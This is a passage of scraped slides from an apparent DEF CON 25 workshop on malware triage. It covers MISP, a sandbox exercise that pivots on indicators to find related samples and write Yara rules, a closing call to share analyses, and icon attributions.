![Page 78: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/78.jpg)
MISP: Example
![Page 79: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/79.jpg)
CIRCL MISP Getting Access
![Page 80: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/80.jpg)
DO IT LIVE!
![Page 81: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/81.jpg)
20 MINUTES
Make sure you have the following tools:• https://www.virustotal.com/
https://malwr.com/ (you will need an account to download samples)• https://www.hybrid-analysis.com/ (you will need an account to download samples)
Exercise Steps• Using the primary indicators you found from the sandbox run search for related samples.
*Hint: try OAPivot for access to multiple malware search APIs• Once you have identified related samples run them in a sandbox and build a checklist of
common attributes• Which attributes do you think would make a good IOC?
*Bonus• Build a Yara rule and ask the instructors to test it against a *new* variant of the malware
![Page 82: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/82.jpg)
Thank you and remember…
Upload samples.
Leave comments.
Join a trust group.
Blog your analysis.
Close the feedback loop
![Page 83: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/83.jpg)
Image Attribution
• Email designed by Henrique Sales from the Noun Project • Browser designed by Kwesi Phillips from the Noun Project • Handshake designed by DEADTYPE from the Noun Project • Gears designed by Rebecca Walthall from the Noun Project • Magnifying Glass designed by Edward Boatman from the Noun Project • Warning designed by Melissa Holterman from the Noun Project • Plus designed by Alex S. Lakas from the Noun Project • Notepad designed by Lemon Liu from the Noun Project • Browser designed by Adriano Emerick from the Noun Project • “Bill O’reilly Flips Out (Do it Live!!!!!11) [DiscoTech RMX]”, http://www.youtube.com/user/morevidznow/about • No designed by Alex Dee from the Noun Project • Sad designed by Brian Dys Sahagun from the Noun Project • Surveillance designed by Luis Prado from the Noun Project • Download designed by Jonathan Searfoss from the Noun Project • Analysis designed by Christopher Holm-Hansen from the Noun Project • Js File designed by useiconic.com from the Noun Project • Bug designed by Matt Crum from the Noun Project • coding by Chameleon Design from the Noun Project • Box by Esteban Gramajo from the Noun Project